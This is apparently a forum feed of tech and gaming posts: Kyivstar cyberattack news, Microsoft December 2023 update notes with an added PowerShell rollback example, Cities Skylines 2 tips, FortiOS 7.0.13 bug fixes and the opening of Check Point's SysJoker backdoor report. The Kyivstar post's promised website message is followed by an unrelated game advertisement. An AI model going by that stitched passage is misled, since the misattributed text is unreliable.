According to a report by Reuters, the Kyivstar mobile operator was hit by a cyberattack that took down most of its network.
A report on the Netblocks website shows the impact of the attack on multiple cities.
Source: https://www.reuters.com/technology/cybersecurity/ukraines-biggest-mobile-operator-suffers-massive-hacker-attack-statement-2023-12-12/
Accessing the Kyivstar website gives this message (machine translated from Ukrainian):

    SeedTheNet
    Ready or Not launches out of Early Access into 1.0 on December 13. Buy now: https://store.steampowered.com/app/11... Los Sueños – The LSPD reports a massive upsurge in violent crime across the greater Los Sueños area. Special Weapons and Tactics (SWAT) teams have been dispatched to respond to various high-risk scenes involving hostage situations, active bomb threats, barricaded suspects, and other criminal activities. Citizens are being advised to practice caution when traveling the city or to stay at home.
    Update:
    TOC to Entry Team, Launch will be in exactly T minus 24 hours. That means tomorrow December 13th, 10:00am PST (UTC-8). Synchronize your watches and get ready.

    SeedTheNet
December 12, 2023—KB5033373 (OS Build 14393.6529)
Applies to: Windows 10, version 1607, all editions; Windows Server 2016, all editions
Release Date: 12/12/2023
Version: OS Build 14393.6529
    For information about Windows update terminology, see the article about the types of Windows updates and the monthly quality update types. For an overview of  Windows 10, version 1607, see its update history page.   
    Highlights
    This update addresses security issues for your Windows operating system. 
    Improvements
    This security update includes quality improvements. When you install this KB: 
    This update affects the Netherlands time zone. It adds the recent man-made landmass outside of Rotterdam to the shape files.
    If you installed earlier updates, only the new updates contained in this package will be downloaded and installed on your device.  
    For more information about security vulnerabilities, please refer to the new Security Update Guide website and the December 2023 Security Updates.
    Known issues in this update
    Microsoft is not currently aware of any issues with this update.
    How to get this update
    Before installing this update
    Microsoft strongly recommends you install the latest servicing stack update (SSU) for your operating system before installing the latest cumulative update (LCU). SSUs improve the reliability of the update process to mitigate potential issues while installing the LCU and applying Microsoft security updates. For general information about SSUs, see Servicing stack updates and Servicing Stack Updates (SSU): Frequently Asked Questions. 
    If you are using Windows Update, the latest SSU (KB5032391) will be offered to you automatically. To get the standalone package for the latest SSU, search for it in the Microsoft Update Catalog. 
    Install this update
Release Channel | Available | Next Step
Windows Update and Microsoft Update | Yes | None. This update will be downloaded and installed automatically from Windows Update.
Windows Update for Business | Yes | None. This update will be downloaded and installed automatically from Windows Update in accordance with configured policies.
Microsoft Update Catalog | Yes | To get the standalone package for this update, go to the Microsoft Update Catalog website.
Windows Server Update Services (WSUS) | Yes | This update will automatically sync with WSUS if you configure Products and Classifications as follows: Product: Windows 10; Classification: Security Updates
    File information
    For a list of the files that are provided in this update, download the file information for cumulative update 5033373.

    SeedTheNet
December 12, 2023—KB5033371 (OS Build 17763.5206)
Applies to: Windows 10 Enterprise LTSC 2019; Windows 10 IoT Enterprise LTSC 2019; Windows 10 IoT Core 2019 LTSC; Windows Server 2019
Release Date: 12/12/2023
Version: OS Build 17763.5206
    For information about Windows update terminology, see the article about the types of Windows updates and the monthly quality update types. For an overview of Windows 10, version 1809, see its update history page.  
    Highlights 
    This update addresses security issues for your Windows operating system. 
    Improvements
    This security update includes improvements. When you install this KB: 
    This update changes the English name of the former Republic of Turkey. The new, official name is the Republic of Türkiye.
    This update affects the Netherlands time zone. It adds the recent man-made landmass outside of Rotterdam to the shape files.
    This update affects Microsoft Defender for Endpoint (MDE). It enables Conditional Access (CA) scenarios.
    If you installed earlier updates, only the new updates contained in this package will be downloaded and installed on your device.
    For more information about security vulnerabilities, please refer to the new Security Update Guide website and the December 2023 Security Updates.
    Windows 10 servicing stack update - 17763.5084
    This update makes quality improvements to the servicing stack, which is the component that installs Windows updates. Servicing stack updates (SSU) ensure that you have a robust and reliable servicing stack so that your devices can receive and install Microsoft updates. 
Known issues in this update
Symptom: Using the FixedDrivesEncryptionType or SystemDrivesEncryptionType policy settings in the BitLocker configuration service provider (CSP) node in mobile device management (MDM) apps might incorrectly show a 65000 error in the "Require Device Encryption" setting for some devices in your environment. Affected environments are those with the "Enforce drive encryption type on operating system drives" or "Enforce drive encryption on fixed drives" policies set to enabled and selecting either "full encryption" or "used space only". Microsoft Intune is affected by this issue, but third-party MDMs might also be affected.
Important: This issue is a reporting issue only and does not affect drive encryption or the reporting of other issues on the device, including other BitLocker issues.
Workaround: To mitigate this issue in Microsoft Intune, you can set the "Enforce drive encryption type on operating system drives" or "Enforce drive encryption on fixed drives" policies to Not configured.
We are working on a resolution and will provide an update in an upcoming release.
    How to get this update
    Before installing this update
    Microsoft now combines the latest servicing stack update (SSU) for your operating system with the latest cumulative update (LCU). SSUs improve the reliability of the update process to mitigate potential issues while installing the LCU. For general information about SSUs, see Servicing stack updates and Servicing Stack Updates (SSU): Frequently Asked Questions. 
    Prerequisite:
    You must install the August 10, 2021 SSU (KB5005112) before installing the LCU. 
    Install this update
Release Channel | Available | Next Step
Windows Update and Microsoft Update | Yes | None. This update will be downloaded and installed automatically from Windows Update.
Windows Update for Business | Yes | None. This update will be downloaded and installed automatically from Windows Update in accordance with configured policies.
Microsoft Update Catalog | Yes | To get the standalone package for this update, go to the Microsoft Update Catalog website.
Windows Server Update Services (WSUS) | Yes | This update will automatically sync with WSUS if you configure Products and Classifications as follows: Product: Windows 10; Classification: Security Updates
    If you want to remove the LCU
To remove the LCU after installing the combined SSU and LCU package, use the DISM /Remove-Package command-line option with the LCU package name as the argument. You can find the package name by using this command: DISM /online /get-packages.
    Running Windows Update Standalone Installer (wusa.exe) with the /uninstall switch on the combined package will not work because the combined package contains the SSU. You cannot remove the SSU from the system after installation.
    File information
    For a list of the files that are provided in this update, download the file information for cumulative update 5033371.
    For a list of the files that are provided in the servicing stack update, download the file information for the SSU - version 17763.5084. 

    SeedTheNet
December 12, 2023—KB5033118 (OS Build 20348.2159)
Applies to: Windows Server 2022
Release Date: 12/12/2023
Version: OS Build 20348.2159
For information about Windows update terminology, see the article about the types of Windows updates and the monthly quality update types. For an overview of Windows Server 2022, see its update history page.
Note: Follow @WindowsUpdate to find out when new content is published to the Windows release health dashboard.
    Improvements
    This security update includes quality improvements. When you install this KB:
    This update affects the Netherlands time zone. It adds the recent man-made landmass outside of Rotterdam to the shape files.
    This update affects Microsoft Defender for Endpoint (MDE). It enables Conditional Access (CA) scenarios.
    If you installed earlier updates, only the new updates contained in this package will be downloaded and installed on your device.
    For more information about security vulnerabilities, please refer to the Security Update Guide and the December 2023 Security Updates.
    Windows Server 2022 servicing stack update - 20348.2084
    This update makes quality improvements to the servicing stack, which is the component that installs Windows updates. Servicing stack updates (SSU) ensure that you have a robust and reliable servicing stack so that your devices can receive and install Microsoft updates.
    Known issues in this update
    Microsoft is not currently aware of any issues with this update.
    How to get this update
    Before installing this update
    Microsoft now combines the latest servicing stack update (SSU) for your operating system with the latest cumulative update (LCU). For general information about SSUs, see Servicing stack updates and Servicing Stack Updates (SSU): Frequently Asked Questions.
    Install this update
Release Channel | Available | Next Step
Windows Update and Microsoft Update | Yes | None. This update will be downloaded and installed automatically from Windows Update.
Windows Update for Business | Yes | None. This update will be downloaded and installed automatically from Windows Update in accordance with configured policies.
Microsoft Update Catalog | Yes | To get the standalone package for this update, go to the Microsoft Update Catalog website.
Windows Server Update Services (WSUS) | Yes | This update will automatically sync with WSUS if you configure Products and Classifications as follows: Product: Microsoft Server operating system-21H2; Classification: Security Updates
    If you want to remove the LCU
To remove the LCU after installing the combined SSU and LCU package, use the DISM /Remove-Package command-line option with the LCU package name as the argument. You can find the package name by using this command: DISM /online /get-packages.
    Running Windows Update Standalone Installer (wusa.exe) with the /uninstall switch on the combined package will not work because the combined package contains the SSU. You cannot remove the SSU from the system after installation.
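The LCU removal procedure above, and the identical one given for KB5033371, carried out from an elevated PowerShell session. This is an added example, not part of the Microsoft KB article; it assumes the DISM PowerShell module (Get-WindowsPackage / Remove-WindowsPackage) is present and that LCU packages carry the usual "Package_for_RollupFix" name prefix.

```powershell
# Added example, not from the KB article. Run as Administrator.
# Assumptions: DISM PowerShell module available; LCU package names start with
# "Package_for_RollupFix" (the SSU shows up as "Package_for_ServicingStack*").

# 1. Record the build the machine is on before touching anything.
$ver = Get-ItemProperty 'HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion'
"Current build: {0}.{1}" -f $ver.CurrentBuildNumber, $ver.UBR   # e.g. 20348.2159

# 2. Same data as "DISM /online /get-packages", but as objects you can filter.
$lcu = Get-WindowsPackage -Online |
    Where-Object { $_.PackageName -like 'Package_for_RollupFix*' -and $_.PackageState -eq 'Installed' } |
    Sort-Object InstallTime -Descending

$lcu | Select-Object PackageName, PackageState, InstallTime | Format-Table -AutoSize

# 3. Remove only the newest LCU. The SSU is deliberately left alone: the KB states it
#    cannot be removed once installed, and wusa /uninstall does not work on the
#    combined package.
if ($lcu.Count -gt 0) {
    $target = $lcu[0].PackageName
    Write-Host "Removing LCU: $target"
    # Equivalent command-line form:  DISM /online /Remove-Package /PackageName:$target
    Remove-WindowsPackage -Online -PackageName $target -NoRestart
}
```

Reboot afterwards to complete the removal; keep the recorded build number so you can confirm the machine is back on the pre-update build.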
    File Information
    For a list of the files that are provided in this update, download the file information for cumulative update 5033118. 
    For a list of the files that are provided in the servicing stack update, download the file information for the SSU - version 20348.2084. 

    SeedTheNet
If you have been waiting for Cities Skylines 2 and were then disappointed by how poorly it runs, that is completely understandable. I was able to avoid the low-FPS start of the game, but I wasn't able to continue for long, because loading my saved city would keep crashing the game!
According to a post by the Colossal Order developers, we have to tweak some settings in order to get better FPS from the game, since the game is very unoptimized and still needs a lot of fixing, or needs to be saved by the community modders.
The developers' first recommendation was to turn the resolution down to 1080p; I kept it at 1440p and followed the other recommendations below:

Depth of Field - Disabled
Volumetrics Quality - Disabled
Motion Blur - Disabled
Dynamic Resolution Scale Quality - Disabled

Even after tweaking those settings you will still experience stuttering, sudden drops in FPS and even crashes; developer patches are still needed, because the game isn't in the condition it could have been.

    SeedTheNet

    GTA VI Trailer 1

By SeedTheNet, in Gaming

Grand Theft Auto VI is an upcoming action-adventure game in development by Rockstar Games. It is due to be the eighth main Grand Theft Auto game, following Grand Theft Auto V.
    Grand Theft Auto VI heads to the state of Leonida, home to the neon-soaked streets of Vice City and beyond in the biggest, most immersive evolution of the Grand Theft Auto series yet. Coming 2025 to PlayStation 5 and Xbox Series X|S.
    https://www.rockstargames.com/VI

    SeedTheNet
    Resolved issues
    The following issues have been fixed in version 7.0.13. To inquire about a particular bug, please contact Customer Service & Support.
Anti Spam
Bug ID | Description
877613 | Mark as Reject can still be chosen as an Action in an Anti-Spam Block/Allow List in the GUI.
Anti Virus
Bug ID | Description
911332 | When UTM status is enabled and the AV profile has no configuration, all SSL traffic is dropped and there is no WAD output.
923883 | The FortiGate may display an error log in the crash log due to AV delta update. In case of failure, a full successful AV update is done.
Application Control
Bug ID | Description
939565 | Cannot query meta rules list; seen on graceful/non-graceful upgrade.
DNS Filter
Bug ID | Description
931998 | DNS filter flow external domain AAAA query can still check the default category but not the remote category.
Endpoint Control
Bug ID | Description
897048 | FortiOS should support EMS 7.2.1 auth API status code changes.
913324 | GUI repeatedly calls the EMS API, which can cause EMS to not authorize the FortiGate correctly.
Explicit Proxy
Bug ID | Description
817582 | When there are many users authenticated by an explicit proxy policy, the Firewall Users widget can take a long time to load. This issue does not impact explicit proxy functionality.
859693 | Sessions between the explicit proxy and server stay in SYN_SENT state when using IP pools in the explicit proxy policy for source NAT, even though the sessions have been established. Traffic is not impacted.
863665 | Denied explicit proxy keeps using the Fortinet_CA_SSL default certificate, even if the configured certificate is different.
889300 | Wrong source IP address used for packets through explicit proxy routed to a member of an SD-WAN interface.
923302 | Cannot send a picture through the web explicit proxy.
Firewall
Bug ID | Description
719311 | On the Policy & Objects > Firewall Policy page in 6.4.0 onwards, the IPv4 and IPv6 policy tables are combined but the custom section name (global label) is not automatically checked for duplicates. If there is a duplicate custom section name, the policy list may show empty for that section. This is a display issue only and does not impact policy traffic.
752267 | Load Balance Monitor detects a server in standby mode as being down.
848058 | NPD failed to parse zone in the source interface of a DoS/ACL policy and failed to offload.
851212 | After traffic flow changes to FGSP peer from owner, iprope information for synchronized sessions does not update on the peer side.
861981 | Traffic drops between two back-to-back EMAC VLAN interfaces.
879225 | Egress interface cannot be intermittently matched for Wake-on-LAN (broadcast) packets.
879705 | Traffic issues occur with virtual servers after upgrading.
884908 | Implicit deny policy is allowing "icmp/0/0" traffic.
895946 | Access to some websites fails after upgrading to FortiOS 7.2.3 when the firewall policy is in flow-based inspection mode.
897849 | Firewall Policy list may show empty sequence grouping sections if multiple policies are sharing the same global-label.
912089 | Optimize CPU usage caused by a rare error condition which leads to no data being sent to the collector.
914939 | UDP fragments dropped due to DF being set. Only the set honor-df global option.
926029 | New sessions are created and evaluated after a certain number of UDP packets, even if set block-session-timer 300 is set.
951373 | Traffic shaping is not matching the correct queue for outbound traffic.
FortiView
Bug ID | Description
894957 | On FortiView Websites, the real time view is always empty if disk logging is disabled.
GUI
Bug ID | Description
863126 | In an environment where the Security Fabric is enabled and there are more than 100 firewall object conflicts between the root and downstream FortiGates, the Firewall Object Synchronization pane does not list the details.
892207 | Unable to authorize a newly discovered FortiAP from the WiFi Controller > Managed FortiAPs page.
893560 | When private data encryption is enabled, the GUI may become unresponsive and HA may fail to synchronize the configuration.
907041 | Network > SD-WAN > SD-WAN Zones and SD-WAN Rules pages do not load if a shortcut tunnel is triggered.
916236 | GUI policy table cannot display sequence grouping section titles correctly if they are duplicated in the global label.
919390 | Disabling gui-wireless-controller on the root VDOM impacts other VDOMs (unable to add or show WiFi widgets on first load).
943949 | When editing an interface description in the GUI, the following characters are not allowed: <, >, (, ), #, ', and ".
946878 | FortiGate HA management interface in the GUI does not allow multiple route entries, but the CLI does allow them.
HA
Bug ID | Description
703614 | HA secondary synchronization fails and keeps rebooting when the primary has a split port configuration.
771316 | Platforms in an HA environment get stuck in a reboot loop while attempting to synchronize configurations that differ in split ports.
805663 | After upgrading, rebooting the primary in HA (A-A) results in unusually high bandwidth utilization on redundant interfaces.
818432 | When private data encryption is enabled, all passwords present in the configuration fail to load and may cause HA failures.
838571 | After an HA split-brain event, the PPPoE interfaces are not recovered.
870312 | On a FortiGate HA cluster, both primary and secondary units are displayed as the Primary on the GUI top banner, and as Current HA mode in the CLI.
875984 | FortiGate goes out-of-sync after changing parameters of VDOM link interfaces.
881337 | Adding a VLAN interface on any VDOM causes BGP flapping and VIP connectivity issues on VDOMs in vcluster2.
893041 | Cannot access out-of-band IPv6 address on HA secondary unit.
897865 | When NP7 platforms enable the GTP enhanced mode, it does not use uninterruptible upgrade.
902945 | Lost management connectivity to the standby node via in-band management.
904318 | FortiGate sent ARP request with loopback IP address as the source address.
912665 | FGCP primary-secondary cluster only uses one session-sync-dev, in spite of having multiple session-sync-dev.
916216 | When adding a new interface, some other interfaces have the wrong virtual MAC address.
920233 | The System > HA page is missing from the GUI on 5K models.
931724 | HA events not synchronizing between members, leading to unexpected HA status.
950868 | Traffic is not forwarded on L2 peer to keep FGSP with an available L2 connection.
953167 | Access to console and SSH is lost due to a specific configuration.
Hyperscale
Bug ID | Description
915796 | With an enabled hyperscale license, in some cases with exception traffic (like ICMP error traverse), the FortiGate may experience unexpected disruptions when handling the exception traffic.
924196 | Device is rebooting randomly when driver processes exception packets.
ICAP
Bug ID | Description
884339 | When the algo process starts up, it attempts to build an ICAP profile without allocating memory beforehand.
Intrusion Prevention
Bug ID | Description
823583 | Failover on clustered web application using keepalived daemon does not work seamlessly.
842523 | IPv6 with hardware offloading and IPS drops traffic (msg="anti-replay check fails, drop").
860315 | Unexpected behavior in IPS engine when executing diagnose test application ipsmonitor 44.
862830 | [?Q?ci_" sekret=] causes the parser to create a new field, "sekret=".
873975 | Source MAC changes and the packet drops due to both sides of the session using the same source MAC address.
882593 | HTTPS traffic slows when IPS with NTurbo is used over a virtual wire pair.
892302 | Constant reloading of the external domain table is causing high CPU due to lock contention when reloading the table.
926639 | Constant reloading of the shared memory external domain table is causing high CPU usage due to lock contention when reloading the table.
952270 | IPS logs for VIP traffic show the external IP as a destination for some signatures.
IPsec VPN
Bug ID | Description
766750 | FortiGate does not accept secondary tunnel IP address in the same subnet as the primary tunnel.
812229 | ASCII-encoded byte code of remote gateway IP is displayed in the GUI and CLI when a VPN tunnel is formed using IKEv1 or v2 if the peer-id is not configured.
872769 | Proxy ARP stops working for a client connected to a dialup IPsec when the previous VPN was established and is deleted.
885333 | Forwarded broadcast traffic on ADVPN shortcut tunnel interface dropped.
887800 | In an L2TP configuration, set enforce-ipsec enable is not working as expected after upgrading.
920725 | IPsec tunnels that have external DHCP services for IP assignment have an extra selector added after upgrading to 7.0.11.
922064 | Firewall becoming unresponsive to DPD/IKE messages, causing IPsec VPNs to drop.
926048 | Traffic through a shortcut got dropped after an HA failover.
928774 | IPsec VPN connection should allow % in FortiClient Connect REG_PASSWD field.
932112 | EAP in IKEv2 dialup IPsec connection does not work with two firewall policies, each using both the IKEv2 interface and user group.
949086 | Policy route is not matching ESP traffic.
954614 | IPsec phase 2 negotiation fails with "failed to create dialup instance, error 22" error message.
Log & Report
Bug ID | Description
831441 | The forward traffic log shows exabytes of data being sent and received from external to external IP addresses in multiple VDOMs.
860822 | When viewing logs on the Log & Report > System Events page, filtering by domain\username does not display matching entries.
879228 | FortiAnalyzer override settings are not taking effect when ha-direct is enabled.
893199 | The FortiGate does not generate deallocate/allocate logs of the first IP pool when the first IP pool has been exhausted.
902797 | IPS alert email not being sent when an IPS attack event has triggered.
908856 | Traffic log can show exabytes of data sent and received when the generating log task is triggered from userspace.
932537 | If Security Rating is enabled to run on schedule (every 4 hours), the FortiGate can unintentionally send local-out traffic to fortianalyzer.forticloud.com during the Security Rating run.
Proxy
Bug ID | Description
783549, 902613, 921247 | An error condition occurs in WAD caused by multiple outstanding requests sent from client to server with UTM enabled.
785927 | Unexpected behavior in WAD when multiple DHCP servers are configured.
820096 | CPU usage issue in proxyd caused by the absence of TCP teardown.
863132 | Proxy mode inspection is slow when testing a single TCP stream from fast.com, which causes bandwidth slowness on FG-100F and FG-200F devices.
882182 | Unexpected behavior in WAD due to the activation of firewall protocol options, with both client and server comfort features enabled.
897347 | Memory usage issue caused by the WAD user info process while authenticating the LDAP users.
912116 | Website (li***.cz) is not working in proxy inspection mode with deep inspection and web filter applied.
REST API
Bug ID | Description
892237 | Updating the HA monitor interface using the REST API PUT request fails and returns a -37 error.
903908 | The forticron application crashes when restoring a VDOM configuration.
948356 | An error condition occurs in HTTPSD when a REST API request is sent with invalid parameters.
Routing
Bug ID | Description
775752 | link-down-failover does not bring the BGP peering down.
779330 | The SD-WAN service with load-balance mode is disabled, even though there is still a member alive in the service rule.
827565 | Using set load-balance-mode weight-based in SD-WAN implicit rule does not take effect occasionally.
839669 | Static route through an IPsec interface is not removed after the BFD neighbor goes down.
858248 | OSPF summary address for route redistribution from static route via IPsec VPN always persists.
875668 | SD-WAN SLA log information has incorrect inbound and outbound bandwidth values.
900941 | config redistribute routing subsections cannot be configured when in workspace mode.
906896 | Make OSPFv3 update the translator role and translated Type-5 LSA when the ASBR table is updated.
922491 | Static routes are installed on hub FortiGate with add-route disabled in ADVPN scenario.
924940 | When there are a lot of policies (several thousand), the interface member selection for the SD-WAN Zone dialog may take up to a minute to load.
928152 | FortiGate generates two OSPF stub entries for the same prefix after upgrading from 6.4 to 7.0.
Security Fabric
Bug ID | Description
851656 | Sessions with csf_syncd_log flag in a Security Fabric are not logged.
912592 | Allow comments and IP addresses to be on the same line for external IP address threat feeds.
912917 | Send Fabric API calls with pagination filter.
917024 | Unexpected behavior in Security Fabric daemon (CSFD) caused by triggering HA failover while using Security Fabric.
920391 | Non-management VDOM is not allowed to set a source-ip for config system external-resource.
922896 | Azure SDN connector always uses HA management port for DNS resolution. This might not work on premises where the HA management port does not have a public IP address assigned.
SSL VPN
Bug ID | Description
631809 | Configuring thousands of mac-addr-check-rule in portal makes the CPU spike significantly if several hundred users are connecting to the FortiGate, thus causing SSL VPN packet drops.
843756 | Customer bookmark (*.tr***.pt) is not accessible when using SSL VPN web mode.
859088 | FortiGate adds an extra parenthesis and causes clicking all links to fail in SSL VPN web mode.
871229 | SSL VPN web mode does not load when connecting to customer's internal site.
873516 | FortiGate misses the closing parenthesis when running the function to rewrite the URL.
875167 | Webpage opened in SSL VPN web portal is not displayed correctly.
881220 | Found bad login for SSL VPN web-based access when enabling URL obscuration.
881268 | Disconnecting from SSL VPN using the SSL-VPN widget does not disconnect the SSL VPN tunnel.
884869 | Web mode bookmark showing blank page due to JS rewrite.
885978 | Some buttons in URL are not working in SSL VPN web mode.
886989 | SSL VPN process reaches 99% CPU usage when HTTP back-end server resets the connection in the middle of a POST request.
887345 | When a user needs to enter credentials through a pop-up window, the key events for modifier keys detected by SDL were ignored.
887674 | FortiGate will intermittently stop accepting new SSL VPN connections across all VDOMs.
897385 | Internal website keeps asking for credentials with SSL VPN web mode.
897665 | The external DHCP server is not receiving hostnames in SSL VPN and DHCP relay.
904919 | DHCP option 12 hostname needed for SSL VPN with external DHCP servers.
927475 | SSL VPN tunnel down log message not generated when an IP address is disassociated before the old tunnel times out.
933985 | FortiGate as SSL VPN client does not work on NP6 and NP6XLite devices.
950157 | SSL VPN connected/disconnected endpoint event log can be in the wrong sequence.
952860 | During a handshake when FortiClient sends a larger-than-MTU hello message, the packet is fragmented by the IP layer and dropped by the FortiGate.
Switch Controller
Bug ID | Description
890912 | FortiLink VLAN interface should be renamed from default to _default after upgrading to 7.0.10.
893405 | One discovery one transmit buffer was allocated and was not released on connection terminations.
894735 | Unable to configure more than one NAC policy using the same EMS tag for different FortiSwitch groups.
911232 | Security rating shows an incorrect warning for unregistered FortiSwitches on the WiFi & Switch Controller > Managed FortiSwitches page.
920231 | FortiGate loses QoS ip-dscp-map configuration after reboot.
936081 | The vlan-optimization {enable | disable} and vlan-all-mode all configuration options disappear after upgrade or reboot.
System
Bug ID   Description
708964   CPU usage issue is observed, caused by reloading the system when the system has cfg-save set to revert.
713951   Not all ports come up after a LAG bounce on an 8 × 10 GB LAG with an ASR9K. Affected platforms: FG-3960E and FG-3980E.
724085   Traffic passing through an EMAC VLAN interface when the parent interface is in another VDOM is blocked if NP7 offloading is enabled.
729912   DNS proxy does not transfer the DNS query for IPv6 neighbor discovery (ND) when client devices are using random MAC addresses, so one device can configure many IPv6 addresses.
822297   Polling fgfwpolid returns disabled policies.
828129   A disabled EMAC VLAN interface is replying to a ping.
832154   The cmdbsvr process may crash when there are many addresses and address groups that include each other recursively.
842159   FortiGate 200F interfaces stop passing traffic after some time.
855573   False alarm for PSU2 occurs with only one PSU installed.
859393   SNMP poll for fgExplicitProxyRequests returns 0.
862519   FortiGate 40F-3G4G WWAN connection is unstable on the Verizon carrier.
866437   CPU usage issue caused by the new Linux kernel.
867663   The FEC configuration under the interface is not respected when port23 and port24 are members of an LACP aggregate and the connection is 100G. Affected platforms: FGT-340xE, FGT-360xE.
869044   If the original packet was forwarded with NAT, the generated ICMP error is routed back to the SNAT'ed address.
873805   CPSS usage goes to 99% and causes initiation issues when traffic is flowing upon boot. Affected platforms: FG-40xF, FG-60xF, FG-300xF.
874292   ssh-rsa should be disabled under the SSH server_host_key_algorithm.
876853   No output of execute sensor list is displayed after rebooting.
879769   If the firewall session is in check-new mode, FortiOS will not flush its NPU offload entry when there is a MAC address update of its gateway.
882187   FortiGate enters conserve mode a few hours after enabling UTM on the policies.
884023   When a user is logged in as a VDOM administrator with restricted access and tries to upload a certificate (System > Certificates), the Create button on the Create Certificate pane is greyed out.
885823   Sensor shows a temperature of 0.00 Celsius.
891165   Auto-script causes FortiGate to repeat commands.
892274   Daylight saving time is not applied for the Cairo time zone.
892478   Interface release from cmdb and iprope keeps updating when DHCP client renewal fails.
894202   Incorrect temperature calculation appears in the sensor list on FG-8xF, FWF-8xF, FG-9xE, FG-10xE, FG-20xE, and FG-14xE.
894884   FSTR session ticket zero causes a memory leak.
903362   SNMP OID fgFwPolLastUsed (1.3.6.1.4.1.12356.101.5.1.2.1.1.4) does not show the correct information about the last time a specific policy was used.
903397   After upgrading to 7.0.11, FortiOS cannot display QSFP+ transceiver information. Affected platforms: FG-110xE, FG-220xE, FG-330xE, FG-340xE, and FG-360xE.
904414   Port speed 1000auto could not link up with a Cisco switch.
904486   The FortiGate may display a false alarm message and subsequently initiate a reboot.
907339   dnsproxy process aborts due to a stack buffer overflow being detected upon function return.
910269   Unexpected behavior caused by the Linux Out of Memory (OOM) killer when memory is very low.
910273   The last reboot reason power cycle reported after a reboot due to a kernel panic is misleading.
910616   When a non-zero DSCP is copied from the ingress to the egress packet for NAT64, the IP checksum is calculated incorrectly.
910651   All members are up on an FG-600F, but the LACP status shows as down after upgrading.
910677   Transparent mode FortiGate does not reply to SYN ACK when communicating with FortiManager.
920085   CPU usage issue observed in dnsproxyd caused by an unused wildcard FQDN.
922965   CPU usage issue observed in the hasync daemon when the session count is large.
922982   FortiGate does not respond to ARP requests for the IP address on the WAN port when the interface is configured as EMAC.
923364   System goes into a halt state with the message Error: Package validation failed... when there are no engine files on the FortiGate and the BIOS security level is set to 2.
924395   IPv6 local-in ping6 to the management interface fails when newly configured.
925657   After a manual system administrator password change, the updated password-expire is not received by the FortiManager auto-update.
926035   On D-series FortiGates, a false alarm during system integrity check failure causes the firewall to reboot.
926817   Review the temperature sensor for the SoC4 system.
929821   An error condition occurred in httpsd and newcli when trying to generate a TAC report from the GUI and CLI, respectively.
939411   Multiple spawns of the Hotplug process consume high CPU resources.
940571   Memory usage issue caused by excessive log files.
942502   Kernel panic occurs when creating EMAC VLAN interfaces based on an aggregate interface with the new kernel 4.1.9.
945871   DNAT does not work on a software switch in explicit mode.
Upgrade
Bug ID   Description
920223   System hangs after upgrade with the following error at bootup: cli 141 die in an exception in line 4495: Hrp.
939011   All transparent VDOMs cannot synchronize because of switch-controller.auto-config.policy.
User & Authentication
Bug ID   Description
790884   The FortiGate will not send a MAC-based authentication RADIUS authentication request for one of the devices on the network.
794477   When a user's membership in AD or port range is changed, all of the user's sessions are cleared.
850473   SSL VPN and firewall authentication SAML does not work when the application requires SHA-256.
858877   Dynamic address only has 100 IP addresses while the FSSO group lists all 56K ACI endpoints.
868994   FortiGate receives FSSO user in the format HOSTNAME$.
883006   Adding a new group membership to an FSSO user terminates all the user's open sessions.
899852   FortiGate is sending the Class(25) AVP with the wrong length in RADIUS accounting when using 2FA with PUSH or external tokens.
901743   An error condition occurs during the processing of UDP packets when device identification is activated on an interface.
943087   Guest management users can no longer view the password automatically generated by the firewall.
VM
Bug ID   Description
901920   AWS external account list supports regional endpoints.
913696   In the periodic status check of the OCI VM status, too many API calls caused a lot of 429 errors.
921168   Restore operation overwrites the passive configuration in an Azure A-P deployment based on the SDN connector.
927323   Event log alert Write Permission Violation to read-only file appears on VMware after taking a snapshot.
932085   In an Azure cluster, the NTP source-ip6 (IPv6) is synchronized while the source-ip (IPv4) is not.
950899   Azure FortiGate keeps rebooting after upgrading to 7.0.11, and the device enters kernel panic.
VoIP
Bug ID   Description
887384   SIP session is dropped by the ALG with a media type doesn't match message.
Web Filter
Bug ID   Description
829704   Web filter is not logging all URLs properly.
878442   FortiGuard block page image (logo) is missing when the Fortinet-Other ISDB is used.
916140   An error condition occurs in WAD caused by a mismatch between the SNI host and CNAME.
941045   Local rating chooses the wrong category if the URL path falsely matches a longer local rating URL.
WiFi Controller
Bug ID   Description
875382   When accessing the managed FortiAP/Switch view with a large number of devices in the topology, the page takes a long time to load.
904349   Unable to create a FortiAP profile in the GUI for dual-5G mode FortiAP U231F/U431F models. Workaround: use the CLI to update the profile to dual-5G mode.
905406   In auth-logon and auth-logout logs, Wi-Fi users with random public IP addresses are observed.
926999   EAP proxy daemon crashes with signal 11 and keeps reloading after receiving an empty username.
ZTNA
Bug ID   Description
888814   Unable to match the first group attribute from the SAML assertion for a ZTNA rule.
889994   After client device information is updated, the session is closed even though all information from the session still matches the policy.
923804   ZTNA logs show the log message Denied: failed to match a proxy-policy when client device information matches the policy.
Common Vulnerabilities and Exposures
Visit https://fortiguard.com/psirt for more information.
Bug ID   CVE references
875854   FortiOS 7.0.13 is no longer vulnerable to the following CVE Reference: CVE-2023-28001
911617   FortiOS 7.0.13 is no longer vulnerable to the following CVE Reference: CVE-2023-37935

    SeedTheNet
    Israel-Hamas War Spotlight: Shaking the Rust Off SysJoker
    https://research.checkpoint.com/2023/israel-hamas-war-spotlight-shaking-the-rust-off-sysjoker
November 23, 2023
Key Findings
Check Point Research is actively tracking the evolution of SysJoker, a previously publicly unattributed multi-platform backdoor, which we assess was utilized by a Hamas-affiliated APT to target Israel.
Among the most prominent changes is the shift to the Rust language, which indicates the malware code was entirely rewritten, while still maintaining similar functionalities. In addition, the threat actor moved to using OneDrive instead of Google Drive to store dynamic C2 (command and control server) URLs.
Analysis of newly discovered variants of SysJoker revealed ties to previously undisclosed samples of Operation Electric Powder, a set of targeted attacks against Israeli organizations between 2016-2017 that were loosely linked to the threat actor known as Gaza Cybergang.
Introduction
    Amid tensions in the ongoing Israel-Hamas war, Check Point Research has been conducting active threat hunting in an effort to discover, attribute, and mitigate relevant regional threats. Among those, some new variants of the SysJoker malware, including one coded in Rust, recently caught our attention. Our assessment is that these were used in targeted attacks by a Hamas-related threat actor.
    SysJoker, initially discovered by Intezer in 2021, is a multi-platform backdoor with multiple variants for Windows, Linux and Mac. The same malware was also analyzed in another report a few months after the original publication. Since then, SysJoker Windows variants have evolved enough to stay under the radar.
    As we investigated the newer variants of SysJoker that were utilized in targeted attacks in 2023, we also discovered a variant written in Rust, which suggests the malware code was completely rewritten. In addition, we also uncovered behavioral similarities with another campaign named Operation Electric Powder which targeted Israel in 2016-2017. This campaign was previously linked to Gaza Cybergang (aka Molerats), a threat actor operating in conjunction with Palestinian interests.
    In this article, we drill down into the Rust version of SysJoker, as well as disclose additional information on other SysJoker Windows variants and their attribution.
